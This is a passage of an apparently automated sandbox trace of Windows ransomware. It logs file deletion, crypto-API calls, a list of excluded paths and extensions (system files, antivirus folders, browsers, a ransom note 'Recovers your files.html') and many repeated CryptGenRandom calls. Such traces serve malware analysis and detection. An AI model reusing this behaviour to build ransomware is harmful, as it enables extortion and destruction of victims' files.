lpBuffer=0x607978*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0143.454] CloseHandle (hObject=0x5a0) returned 1 [0143.454] CloseHandle (hObject=0x588) returned 1 [0143.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash")) returned 0x20 [0143.455] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", dwFileAttributes=0x20) returned 1 [0143.455] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 1 [0143.456] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash")) returned 1 [0143.456] CryptDestroyKey (hKey=0x8be0f8) returned 1 [0143.456] wcslen (_String="OK") returned 0x2 [0143.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.456] CryptDestroyKey (hKey=0x8bdf78) returned 1 [0143.456] CryptDestroyHash (hHash=0x8be1f8) returned 1 [0143.456] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0143.456] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.456] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*NMCRYPT") returned 0 [0143.456] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*Recovers your files.html") returned 0 [0143.456] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*.exe") returned 0 [0143.456] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*.dll") returned 0 [0143.456] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*.lnk") returned 0 [0143.456] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*.bat") returned 0 [0143.456] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*.ini") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*.msi") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*.scf") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*pagefile.sys*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*NTUSER.DAT*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*AppData*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\winrar\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\java\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\TeamViewer\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\windows\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\ESET\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\AVG\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\AVIRA\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*\\AVAST Software\\*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*Atheros*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*Realtek*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*bootmgr*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*boot*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*boot*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*CONFIG.SYS*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*IO.SYS*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*MSDOS.SYS*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*NTDETECT.COM*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*ntldr*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*chrome*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*opera*") returned 0 [0143.457] PathMatchSpecW (pszFile="i641033.hash", pszSpec="*firefox*") returned 0 [0143.457] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", pszSpec="*") returned 1 [0143.457] strlen (_Str="NMoreira") returned 0x8 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, 